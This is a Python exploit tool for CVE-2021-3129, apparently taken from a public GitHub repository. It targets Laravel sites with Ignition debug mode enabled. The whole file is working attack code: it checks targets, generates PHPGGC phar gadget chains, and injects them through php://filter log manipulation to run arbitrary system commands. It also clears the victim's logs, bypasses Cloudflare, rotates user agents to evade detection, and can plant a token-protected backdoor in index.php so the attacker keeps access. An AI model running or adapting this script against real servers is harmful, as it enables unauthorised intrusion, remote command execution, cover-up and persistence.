import argparse import random import sys import requests import os import base64 import zipfile import stat import re import subprocess import readline import locale import json import shutil import uuid from urllib.parse import urlparse from packaging import version import cloudscraper PURPLE = '\033[95m' CYAN = '\033[96m' DARKCYAN = '\033[36m' BLUE = '\033[94m' GREEN = '\033[92m' YELLOW = '\033[93m' RED = '\033[91m' BOLD = '\033[1m' UNDERLINE = '\033[4m' END = '\033[0m' translations = {} LARAVEL_FUNCTION_CHAINS = { "laravel/rce1", "laravel/rce2", "laravel/rce3", "laravel/rce4", "laravel/rce7", "laravel/rce8", "laravel/rce9", "laravel/rce10", "laravel/rce11", "laravel/rce12", "laravel/rce13", "laravel/rce14", "laravel/rce15", "laravel/rce16", "laravel/rce17", "laravel/rce20", "laravel/rce21", "laravel/rce22", } LARAVEL_PHP_CODE_CHAINS = { "laravel/rce5", "laravel/rce6", "laravel/rce18", } LARAVEL_COMMAND_CHAINS = { "laravel/rce19", } LARAVEL_CHAINS = [ "laravel/rce1", "laravel/rce2", "laravel/rce3", "laravel/rce4", "laravel/rce5", "laravel/rce6", "laravel/rce7", "laravel/rce8", "laravel/rce9", "laravel/rce10", "laravel/rce11", "laravel/rce12", "laravel/rce13", "laravel/rce14", "laravel/rce15", "laravel/rce16", "laravel/rce17", "laravel/rce18", "laravel/rce19", "laravel/rce20", "laravel/rce21", "laravel/rce22", ] MONOLOG_CHAINS = [ "monolog/rce1", "monolog/rce2", "monolog/rce3", "monolog/rce5", "monolog/rce6", "monolog/rce7", "monolog/rce8", "monolog/rce9", ] CHAINS = LARAVEL_CHAINS + MONOLOG_CHAINS USER_AGENTS = [ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36", "Mozilla/5.0 (iPhone; CPU iPhone OS 18_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.38 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (iPad; CPU OS 18_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/143.0.7499.38 Mobile/15E148 Safari/604.1", "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.7444.172 Mobile Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0", "Mozilla/5.0 (Macintosh; Intel Mac OS X 15.7; rv:145.0) Gecko/20100101 Firefox/145.0", "Mozilla/5.0 (X11; Linux i686; rv:145.0) Gecko/20100101 Firefox/145.0", "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/145.0 Mobile/15E148 Safari/605.1.15", "Mozilla/5.0 (iPad; CPU OS 15_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/145.0 Mobile/15E148 Safari/605.1.15", "Mozilla/5.0 (Android 16; Mobile; rv:145.0) Gecko/145.0 Firefox/145.0", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0", ] PHPGGC_API_URL = "https://api.github.com/repos/ambionics/phpggc/commits/master" PHPGGC_DIR = "./phpggc-master" PHPGGC_BINARY = os.path.join(PHPGGC_DIR, "phpggc") PHPGGC_VERSION_FILE = ".phpggc_version" class Main: def __init__(self, host, force=False, log_path=None, useragent=False, chain=None, php_executable="php", private_key="", no_cache=False, exec_command=None, cloudflare=False): self.host = host self.force = force self.log_path = log_path self.useragent = self.random_useragent() if useragent else "joshuavanderpoll/CVE-2021-3129" self.chain = chain self.php_executable = php_executable self.no_cache = no_cache self.private_key = private_key if private_key != "" else self.get_cache("private_key") self.root_path = None self.operating_system = None self.is_patched = False self.last_used_chain = None self.exec_command = exec_command self.cloudflare_bypss = cloudflare # Setup session if self.cloudflare_bypss: info('cloudflare.scraper.usage') self.session = cloudscraper.create_scraper(browser={'browser': 'chrome', 'platform': 'windows', 'mobile': False}) else: self.session = requests.session() # Check for previous working chains previous_chain = self.get_cache("working_chain") if chain == None and self.get_cache("working_chain") != "": use_chain = _input('chains.previous.use', previous_chain).lower() if use_chain == "y" or use_chain == "yes": self.chain = self.get_cache("working_chain") self.start() def start(self): loading(format('exploit.start', self.host)) # Check if vulnerable if not self.is_vulnerable(): error('vulnerability.check.failed') exit() # Ask user interaction if not self.exec_command: info('actions.help') self.ask_command() def ask_command(self): if self.exec_command: self.cmd_clear_logs() self.cmd_execute_cmd(self.exec_command) return response = _input('command.prompt') response_list = response.split(" ",1) command = response_list[0].lower() payload = "" if(len(response_list) == 2): payload = response_list[1] if command == "?" or command == "help": # Return list of commands self.cmd_help() elif command == "exit": # Stop script exit() elif command == "clear_logs": # Attempt to clear laravel.log of target self.cmd_clear_logs() elif command == "execute": # Attempt to execute system command on target self.cmd_execute_cmd(payload) elif command == "write": # Attempt to write to the log file of target self.cmd_execute_write(payload) elif command == "patch": # Attempt to patch the vulnerability on the target self.cmd_execute_patch(payload) elif command == "patches": # Attempt to patch the vulnerability on the target self.cmd_execute_patch_details() elif command == "": error('command.input.required') else: error('command.not_found', command) self.ask_command() def cmd_help(self): info('commands.available') print(f"{DARKCYAN} exit {CYAN}- {format('program.exit')}.") print(f"{DARKCYAN} help {CYAN}- {format('commands.show')}.") print(f"{DARKCYAN} clear_logs {CYAN}- {format('logs.clear.prompt')}.") print(f"{DARKCYAN} execute {CYAN}- {format('system.execute.prompt')}.") print(f"{DARKCYAN} write {CYAN}- {format('logs.write.prompt')}.") print(f"{DARKCYAN} patch {CYAN}- {format('vulnerability.patch.prompt')}.") print(f"{DARKCYAN} patches {CYAN}- {format('patch.modes.info')}.") def cmd_clear_logs(self): loading('logs.clear.start') self.exploit_clear_logs() if not self.force: _success('logs.clear.success') def cmd_execute_cmd(self, cmd: str, ignore_specials=False, output_success=True) -> bool: while cmd == "": cmd = _input('command.prompt') loading('command.execute.start', cmd) payloads = self.generate_payload(command=cmd, padding=16, ignore_specials=ignore_specials) i = 0 for payload in payloads: i = i+1 self.last_used_chain = payload['name'] loading('chain.try', payload['name'], i, len(payloads)) self.exploit_execute(payload['data'], output_success) if i < len(payloads): next_chain = _input('chain.next.prompt').lower() if next_chain == "y" or next_chain == "yes": continue else: break def cmd_execute_patch_details(self): print( f"{BLUE}[•] Different patch modes for \"patch \" command:\n" f"{DARKCYAN} env {CYAN}- {format('patch.mode.env')}\n" f"{DARKCYAN} index {CYAN}- {format('patch.mode.index')}\n" f"{DARKCYAN} private {CYAN}- {format('patch.mode.private')}" ) def cmd_execute_patch(self, mode: str): if self.chain == None: warning('chain.invalid') return mode = mode.lower() while (mode != "env" and mode != "index" and mode != "private") or mode == "": mode = _input('patch.mode.prompt') loading('patch.start', mode) private_key = str(uuid.uuid4()) index_patch = base64.b64encode('if(isset($_SERVER["REQUEST_URI"]) && strtolower($_SERVER["REQUEST_URI"]) == "/_ignition/execute-solution") { http_response_code(403); echo "

Exploit patched

"; exit(); }'.encode('utf-8')).decode('utf-8') private_patch = base64.b64encode(('if(isset($_SERVER["REQUEST_URI"]) && strtolower($_SERVER["REQUEST_URI"]) == "/_ignition/execute-solution") {if(!isset($_SERVER["HTTP_X_BYPASS_TOKEN"]) || $_SERVER["HTTP_X_BYPASS_TOKEN"] != "'+private_key+'") {http_response_code(403);echo "

Exploit patched

";exit();}}').encode('utf-8')).decode('utf-8') # Setup needed paths for commands patch_path = f"{self.root_path}\\\\public\\\\patch.php" if self.operating_system == "windows" else f"{self.root_path}/public/patch.php" env_path = f"{self.root_path}\\\\.env" if self.operating_system == "windows" else f"{self.root_path}/.env" index_path = f"{self.root_path}\\\\public\\\\index.php" if self.operating_system == "windows" else f"{self.root_path}/public/index.php" # Prevent double patch input execute_patch = True if self.is_patched and (mode == "index" or mode == "private"): continue_patch = input(YELLOW + f"[!] {format('patch.already')} [Y/N] : ") if continue_patch.lower() != "y" and continue_patch.lower() != "yes": execute_patch = False if not execute_patch: warning('patch.aborted') return patch_command = None if mode == "env": # Updates the .env file so that APP_DEBUG will be set from 'true' to 'false' patch_command = f'echo "" > "{patch_path}"' elif mode == "index": # Injects code into index.php which prevents access to '/_ignition/execute-solution' patch_command = f'echo "" > "{patch_path}"' elif mode == "private": # Same as the 'index' mode but generates a private header key, so you can still access the vulnerability self.private_key = private_key self.cache_data('private_key', self.private_key) _success(f"Your \"X-BYPASS-TOKEN\" key is: \"{self.private_key}\".") patch_command = f'echo "" > "{patch_path}"' if patch_command == None: error('patch.payload.failed') return # Send patch command self.cmd_execute_cmd(patch_command, True, False) # Set headers if not self.cloudflare_bypss: headers = { "User-Agent": self.useragent } if self.private_key != "": headers['X-BYPASS-TOKEN'] = self.private_key request = self.session.get(url=f"{self.host}patch.php", verify=False, headers=headers) if request.status_code == 200: self.is_patched = True _success('patch.success') else: error('patch.failed') def cmd_execute_write(self, text: str, path=None): while text == "": text = _input('logs.write.prompt.text') loading('logs.write.start', text) payload = self.generate_write_payload(text, 16) loading('logs.clear.starting') # Step 1. Clear logs to prevent old payloads executing. self.exploit_clear_logs() loading('logs.error.start') # Step 2. Cause a error to write phar file. if self.exploit_cause_error().status_code != 500: error('logs.error.failed') return _success('logs.error.success') loading('payload.send.start') # Step 3. Cause error with payload so payload in log file. if self.exploit_request(payload, 500).status_code != 500: error('payload.send.failed') return _success('payload.send.success') loading('payload.convert.start') # Step 4. Change te log file into the payload in the log file. path = path if path != None else self.log_path if (self.exploit_request(f"php://filter/read=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource={path}", 200).status_code != 200): error('payload.convert.failed') return _success('payload.convert.success') def cache_data(self, key: str, value): if self.no_cache: return if not os.path.exists('.cache'): os.mkdir('.cache') parsed_host = urlparse(self.host) file_name = re.sub('[^A-Za-z0-9]+', '', parsed_host.netloc) + ".json" file_path = os.path.join(".cache", file_name) file_contents = {} if not os.path.exists(file_path): with open(file_path, "w") as f: f.write("{}") else: with open(file_path, "r") as f: file_contents = json.loads(f.read()) file_contents[key] = value with open(file_path, "w") as f: f.write(json.dumps(file_contents, indent=4)) def get_cache(self, key: str): if self.no_cache: return "" file_contents = "" if not os.path.exists('.cache'): return file_contents parsed_host = urlparse(self.host) file_name = re.sub('[^A-Za-z0-9]+', '', parsed_host.netloc) + ".json" file_path = os.path.join(".cache", file_name) if os.path.exists(file_path): with open(file_path, "r") as f: json_conents = json.loads(f.read()) if key in json_conents: file_contents = json_conents[key] return file_contents def exploit_clear_logs(self) -> requests.Response: # Clear entire log file return self.exploit_request(f"php://filter/write=convert.iconv.utf-8.utf-16le|convert.quoted-printable-encode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource={self.log_path}", 200, True) # return self.exploit_request(f"php://filter/read=consumed/resource={self.log_path}", 200) def exploit_cause_error(self) -> requests.Response: # Cause error by sending path parameter return self.exploit_request("AA", 500) def exploit_execute(self, payload: str, output_success=True): success = True loading('logs.clear.starting') # Step 1. Clear logs to prevent old payloads executing. self.exploit_clear_logs() loading('logs.error.start') # Step 2. Cause a error to write phar file. if self.exploit_cause_error().status_code != 500: error('logs.error.failed') self.exploit_clear_logs() success = False else: _success('logs.error.success') loading('payload.send.bulk.start') if self.exploit_request(payload, 500).status_code != 500: # Step 3. Cause error with payload so payload in log file. error('payload.send.failed') self.exploit_clear_logs() success = False else: _success('payload.send.success') loading('payload.convert.start') # Step 4. Change te log file into the payload in the log file. if (self.exploit_request(f"php://filter/read=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource={self.log_path}", 200).status_code != 200): error('payload.convert.failed') self.exploit_clear_logs() success = False else: _success('payload.convert.success') exploited = self.exploit_request(f"phar://{self.log_path}", 500) # Step 5. Let host execute phar script. if exploited.status_code == 500 and "cannot be empty" in exploited.text: if output_success: _success('output.display') result = exploited.text.split("")[1] print(END + result) if not result.strip() == "": print(f"{YELLOW}⭐ If this script helped you, consider starring {UNDERLINE}https://github.com/joshuavanderpoll/CVE-2021-3129{END}{YELLOW} ⭐{END}") if self.chain == None: _success('chain.found') self.chain = self.last_used_chain self.cache_data('working_chain', self.chain) else: error_search = r"🧨 (.*?)<\/title>" error_result = re.search(error_search, exploited.text) if error_result: error('payload.execute.failed.message', error_result[1]) success = False else: error('payload.execute.failed') success = False self.exploit_clear_logs() self.exploit_clear_logs() return success def random_useragent(self) -> str: return random.choice(USER_AGENTS) def get_local_phpggc_commit(self) -> str | None: """ Lees lokale phpggc commit SHA uit .phpggc_version (als die bestaat). """ if not os.path.exists(PHPGGC_VERSION_FILE): return None try: with open(PHPGGC_VERSION_FILE, "r") as f: sha = f.read().strip() return sha or None except OSError: return None def get_remote_phpggc_commit(self) -> str | None: """ Haal laatste commit SHA van ambionics/phpggc:master via de publieke GitHub API. """ try: resp = self.session.get( PHPGGC_API_URL, headers={ "Accept": "application/vnd.github.v3+json", "User-Agent": self.useragent, }, verify=False, timeout=10, ) except Exception: return None if resp.status_code != 200: return None try: data = resp.json() except ValueError: return None return data.get("sha") def setup_phpggc(self): zip_path = "./master_phpggc.zip" loading('phpggc.download.start') # Remove old phpggc directory if os.path.exists(PHPGGC_DIR): shutil.rmtree(PHPGGC_DIR, ignore_errors=True) # Download repository zip (master branch) request = self.session.get( "https://github.com/ambionics/phpggc/archive/refs/heads/master.zip", verify=False, allow_redirects=True, headers={"User-Agent": self.useragent}, ) with open(zip_path, "wb") as f: f.write(request.content) # Unzip zip with zipfile.ZipFile(zip_path, "r") as zip_ref: zip_ref.extractall("./") _success('phpggc.download.success') phpggc_path = PHPGGC_BINARY # Setup phpggc execute permissions loading('phpggc.permissions.update.start') if os.path.exists(phpggc_path): st = os.stat(phpggc_path) os.chmod(phpggc_path, st.st_mode | stat.S_IEXEC) _success('phpggc.permissions.update.success') # Remove extracted zip file os.unlink(zip_path) def ensure_phpggc(self): """ Check for phpggc updates and download if needed. """ local_sha = self.get_local_phpggc_commit() remote_sha = self.get_remote_phpggc_commit() phpggc_exists = os.path.exists(PHPGGC_BINARY) needs_update = False if not phpggc_exists: # Never downloaded before needs_update = True elif remote_sha and local_sha and remote_sha != local_sha: # New commit available -> update needs_update = True if needs_update: self.setup_phpggc() # Only write if we have a valid SHA if remote_sha: try: with open(PHPGGC_VERSION_FILE, "w") as f: f.write(remote_sha) except OSError: # Not fatal – phpggc itself still works pass def generate_payload(self, command: str, padding=0, ignore_specials=False) -> list: payloads = [] loading('payload.generate.start') # Prepare command if not ignore_specials: if '/' in command: command = command.replace('/', '\\/') command = command.replace('\'', '\\\'') if '\'' in command: command = command.replace("'", "\'") try: subprocess.run( [self.php_executable, "-v"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, check=True ) except FileNotFoundError: error('php.missing') return [] except subprocess.CalledProcessError: error('php.invalid') return [] # Check PHPGGC self.ensure_phpggc() if not os.path.exists(PHPGGC_BINARY): error('phpggc.missing') return [] # Build payload if os.path.exists("./.tmp"): shutil.rmtree("./.tmp") os.mkdir("./.tmp") chains = CHAINS if self.chain is None else [self.chain] for chain in chains: phar_name = chain.replace("/", "-") + ".phar" phar_path = f"./.tmp/{phar_name}" chain_l = chain.lower() cmd = [ self.php_executable, "-dphar.readonly=0", PHPGGC_BINARY, chain, ] if chain_l.startswith("laravel/"): if chain_l in LARAVEL_FUNCTION_CHAINS: # RCE (Function call): <chain> system <command> cmd.extend(["system", command]) elif chain_l in LARAVEL_PHP_CODE_CHAINS: # RCE (PHP code): <chain> 'system("<command>");'\ php_code = f"system('{command}');" cmd.append(php_code) elif chain_l in LARAVEL_COMMAND_CHAINS: # RCE (Command): <chain> <command> cmd.append(command) else: cmd.extend(["system", command]) else: # Other chains cmd.extend(["system", command]) cmd.extend(["--phar", "phar", "-o", phar_path]) # Run phpggc subprocess.run(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) if os.path.exists(phar_path): with open(phar_path, "rb") as f: payload = f.read() payload = base64.b64encode(payload).decode().rstrip("=") payload = "".join(c + "=00" for c in payload) payload = "A" * padding + payload payload = payload.replace("\n", "") + "A" payloads.append({"data": payload, "name": chain}) # Delete temporary files os.unlink(phar_path) _success('payload.generate.success.count', len(payloads)) return payloads def generate_write_payload(self, text: str, padding=0) -> str: loading('payload.generate.start') # Prepare/encode payload payload = base64.b64encode(text.encode()).decode().rstrip('=') payload = ''.join(c + '=00' for c in payload) payload = 'A' * padding + payload _success('payload.generate.success') return payload def exploit_request(self, value: str, expected_response: int = 200, silent=False) -> requests.Response: data = { "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": { "variableName": "variable", "viewFile": value } } headers = { "Content-Type": "application/json", "Accept": "*/*", "User-Agent": self.useragent } if self.private_key != "": headers['X-BYPASS-TOKEN'] = self.private_key request = self.session.post(url=f"{self.host}_ignition/execute-solution", json=data, headers=headers, verify=False) if request.status_code != expected_response and not silent: error_search = r"<title>🧨 (.*?)<\/title>" error_result = re.search(error_search, request.text) if error_result: error('exploit.request.status.invalid.specific', request.status_code, expected_response, error_result[1]) else: error('exploit.request.status.invalid', request.status_code, expected_response) # Check if host has patched vulnerability if "runnable solutions are disabled in non-local environments" in request.text.lower(): error('exploit.patched.local.env') if "solutions can only be executed by requests from a local ip address" in request.text.lower(): error('exploit.patched.local.ip') return request def is_vulnerable(self): loading(format('url.test', self.host)) # Set headers headers = { "User-Agent": self.useragent } if self.private_key != "": headers['X-BYPASS-TOKEN'] = self.private_key request = self.session.get(url=f"{self.host}_ignition/execute-solution", verify=False, headers=headers) # Check if vulnerability already patched attemps = 0 while request.status_code == 403 and "Exploit patched" in request.text: self.is_patched = True if attemps > 0: error('privatekey.invalid', attemps) if attemps >= 3: exit(1) self.private_key = _input('privatekey.required') headers['X-BYPASS-TOKEN'] = self.private_key request = self.session.get(url=f"{self.host}_ignition/execute-solution", verify=False, headers=headers) attemps = attemps+1 # Check vulnerable url by sending invalid GET request (only POST allowed) if request.status_code != 405: info('host.status.invalid', request.status_code) if not self.force: return False # Check if vulnerable url contains signs of Laravel if "laravel" not in str(request.content): if "405 method not allowed" in str(request.content).lower(): error('host.request.refused') else: error('host.not_laravel') if not self.force: return False if not self.force: _success('host.vulnerable') # Check if log path defined in error response loading('logs.path.search') self.find_log_path(content=request.content) if self.log_path is None: error('logs.path.notfound') exit() else: _success('logs.path.found', self.log_path) # Check if laravel version defined in error response laravel_version = self.find_laravel_version(content=request.text) if laravel_version is not None: info('laravel.version.found', laravel_version) if not self.force: patched_version = version.parse("8.4.2") current_version = version.parse(laravel_version) if current_version >= patched_version: error('laravel.patched.version') exit() return True def find_log_path(self, content): # Regex search for file path search_pattern = r"The .* supported .* in file (.*?) on line" search_res = re.search(search_pattern, str(content)) if search_res: file_path = search_res[1] if "/vendor/laravel/framework" in file_path: # Linux system info('laravel.os.linux') self.root_path = file_path.split("/vendor/laravel/framework")[0] self.log_path = f"{self.root_path}/storage/logs/laravel.log" self.operating_system = "linux" if "\\\\vendor\\\\laravel\\\\framework" in file_path: # Windows system info('laravel.os.windows') self.root_path = file_path.split("\\\\vendor\\\\laravel\\\\framework")[0].replace("\\\\", "\\") self.log_path = f"{self.root_path}\\storage\\logs\\laravel.log" self.operating_system = "windows" def find_laravel_version(self, content: str): # Regex search for framework version search_pattern = r"\"framework_version\":\"(.*?)\"" search_res = re.search(search_pattern, content) if search_res: return search_res[1] return None def info(text: str, *args): print(f"{BLUE}[•] {format(text, *args)}{END}") def loading(text: str, *args): print(f"{DARKCYAN}[@] {format(text, *args)}{END}") def error(text: str, *args): print(f"{RED}[!] {format(text, *args)}{END}") def _success(text: str, *args): print(f"{GREEN}[√] {format(text, *args)}{END}") def warning(text: str, *args): print(f"{YELLOW}[!] {format(text, *args)}{END}") def _input(text: str, *args): return input(f"{PURPLE}[?] {format(text, *args)} {END}") def format(text: str, *args): color_codes = { 'PURPLE': PURPLE, 'CYAN': CYAN, 'DARKCYAN': DARKCYAN, 'BLUE': BLUE, 'GREEN': GREEN, 'YELLOW': YELLOW, 'RED': RED, 'BOLD': BOLD, 'UNDERLINE': UNDERLINE, 'END': END } if text in translations: formatted_text = translations[text] # Replace color placeholders with actual escape codes for color, code in color_codes.items(): formatted_text = formatted_text.replace(f"{{{color}}}", code) # Format with any provided args return formatted_text.format(*args) else: return text.format(*args) if args else text def validate_url(url: str) -> bool: # https://stackoverflow.com/a/7160778 regex = re.compile( r'^(?:http)s?://' # http:// or https:// r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain... r'localhost|' # localhost... r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})' # ...or ip r'(?::\d+)?' # optional port r'(?:/?|[/?]\S+)$', re.IGNORECASE) return re.match(regex, url) is not None if __name__ == "__main__": # Load translations strings available_languages = [f.split(".")[0] for f in os.listdir("lang") if f.endswith(".json")] # Default language try: locale.setlocale(locale.LC_ALL, '') except locale.Error: pass lang, enc = locale.getlocale() language_code = lang.split('_')[0] if lang else 'en' if language_code not in available_languages: language_code = "en" with open(f"lang/{language_code}.json", 'r') as f: translations = json.load(f) # Credits print(f"{PURPLE}{BOLD} _____ _____ ___ __ ___ _ _____ ___ ___ ") print(f"{PURPLE}{BOLD} / __\\ \\ / / __|_|_ ) \\_ ) |__|__ / |_ ) _ \\") print(f"{PURPLE}{BOLD}| (__ \\ V /| _|___/ / () / /| |___|_ \\ |/ /_, /") print(f"{PURPLE}{BOLD} \\___| \\_/ |___| /___\\__/___|_| |___/_/___|/_/ ") print(f"{PURPLE}{BOLD} {UNDERLINE}https://github.com/joshuavanderpoll/CVE-2021-3129{END}") print(f"{END}{PURPLE} {format('phpggc.usage')}: {UNDERLINE}https://github.com/ambionics/phpggc{END}\n") # Arguments parser = argparse.ArgumentParser(description='Exploit CVE-2021-3129 - Laravel vulnerability exploit script') parser.add_argument('--host', help=format('parameter.host.prompt'), required=False) parser.add_argument('--force', help=format('parameter.force.prompt'), required=False, default=False, action='store_true') parser.add_argument('--log', help=format('parameter.log.path.prompt'), required=False, default=None) parser.add_argument('--ua', help=format('parameter.useragent.prompt'), required=False, default=False, action='store_true') parser.add_argument('--chain', help=format('parameter.chain.prompt'), required=False, default=None) parser.add_argument('--chains', help=format('parameter.chains.list'), required=False, default=False, action='store_true') parser.add_argument('--php', help=format('parameter.php.prompt'), required=False, default="php") parser.add_argument('--private-key', help=format('parameter.privatekey.prompt'), required=False, default="") parser.add_argument('--no-cache', help=format('parameter.no_store.prompt'), required=False, default=False, action='store_true') parser.add_argument('--exec', help=format('parameter.command.prompt'), required=False, default=False) parser.add_argument('--lang', help=format('parameter.command.language'), required=False, default=None) parser.add_argument('--cf', '--cloudflare', dest='cloudflare', action='store_true', help=format('parameter.cloudflare.prompt')) args = parser.parse_args() # Reload translations strings if args.lang != None: if args.lang not in available_languages: error('language.invalid') exit() with open(f"lang/{args.lang}.json", 'r') as f: translations = json.load(f) # Chains if args.chains: print( f"{BLUE}[•] {format('chains.available')}:\n" f"{DARKCYAN}- Laravel/RCE1 {CYAN}(5.4.27)\n" f"{DARKCYAN}- Laravel/RCE2 {CYAN}(5.4.0 <= 8.6.9+)\n" f"{DARKCYAN}- Laravel/RCE3 {CYAN}(5.5.0 <= 5.8.35)\n" f"{DARKCYAN}- Laravel/RCE4 {CYAN}(5.4.0 <= 8.6.9+)\n" f"{DARKCYAN}- Laravel/RCE5 {CYAN}(5.8.30)\n" f"{DARKCYAN}- Laravel/RCE6 {CYAN}(5.5.* <= 5.8.35)\n" f"{DARKCYAN}- Laravel/RCE7 {CYAN}(? <= 8.16.1)\n" f"{DARKCYAN}- Laravel/RCE8 {CYAN}(7.0.0 <= 8.6.9+)\n" f"{DARKCYAN}- Laravel/RCE9 {CYAN}(5.4.0 <= 9.1.8+)\n" f"{DARKCYAN}- Laravel/RCE10 {CYAN}(5.6.0 <= 9.1.8+)\n" f"{DARKCYAN}- Laravel/RCE11 {CYAN}(5.4.0 <= 9.1.8+)\n" f"{DARKCYAN}- Laravel/RCE12 {CYAN}(5.8.35, 7.0.0, 9.3.10)\n" f"{DARKCYAN}- Laravel/RCE13 {CYAN}(5.3.0 <= 9.5.1+)\n" f"{DARKCYAN}- Laravel/RCE14 {CYAN}(5.3.0 <= 9.5.1+)\n" f"{DARKCYAN}- Laravel/RCE15 {CYAN}(5.5.0 <= v9.5.1+)\n" f"{DARKCYAN}- Laravel/RCE16 {CYAN}(5.6.0 <= v9.5.1+)\n" f"{DARKCYAN}- Laravel/RCE17 {CYAN}(10.31.0)\n" f"{DARKCYAN}- Laravel/RCE18 {CYAN}(10.31.0)\n" f"{DARKCYAN}- Laravel/RCE19 {CYAN}(10.34)\n" f"{DARKCYAN}- Laravel/RCE20 {CYAN}(5.6 <= 10.x)\n" f"{DARKCYAN}- Laravel/RCE21 {CYAN}(5.1.*)\n" f"{DARKCYAN}- Laravel/RCE22 {CYAN}(v10.0.0 <= v11.34.2+)\n" f"\n" f"{DARKCYAN}- Monolog/RCE1 {CYAN}(1.4.1 <= 1.6.0 1.17.2 <= 2.2.0+)\n" f"{DARKCYAN}- Monolog/RCE2 {CYAN}(1.4.1 <= 2.2.0+)\n" f"{DARKCYAN}- Monolog/RCE3 {CYAN}(1.1.0 <= 1.10.0)\n" f"{DARKCYAN}- Monolog/RCE4 {CYAN}(? <= 2.4.4+)\n" f"{DARKCYAN}- Monolog/RCE5 {CYAN}(1.25 <= 2.2.0+)\n" f"{DARKCYAN}- Monolog/RCE6 {CYAN}(1.10.0 <= 2.2.0+)\n" f"{DARKCYAN}- Monolog/RCE7 {CYAN}(1.10.0 <= 2.7.0+)\n" f"{DARKCYAN}- Monolog/RCE8 {CYAN}(3.0.0 <= 3.1.0+)\n" f"{DARKCYAN}- Monolog/RCE9 {CYAN}(3.0.0 <= 3.1.0+)\n" f"{BLUE}{format('from')}: https://github.com/ambionics/phpggc#usage" ) exit() # Validate before scan start if args.host is None: args.host = _input(f"{format('parameter.host.enter')}{PURPLE} :") if args.host[-1] != "/": args.host = args.host + "/" if args.host[0:7] != "http://" and args.host[0:8] != "https://": args.host = f"http://{args.host}" if not validate_url(args.host): error('parameter.host.invalid') exit() if args.chain != None and args.chain.lower() not in CHAINS: error('parameter.chain.invalid', os.path.basename(sys.executable), os.path.basename(__file__)) exit() requests.packages.urllib3.disable_warnings() x = Main( host=args.host, force=args.force, log_path=args.log, useragent=args.ua, chain=args.chain, php_executable=args.php, private_key=args.private_key, no_cache=args.no_cache, exec_command=args.exec, cloudflare=args.cloudflare )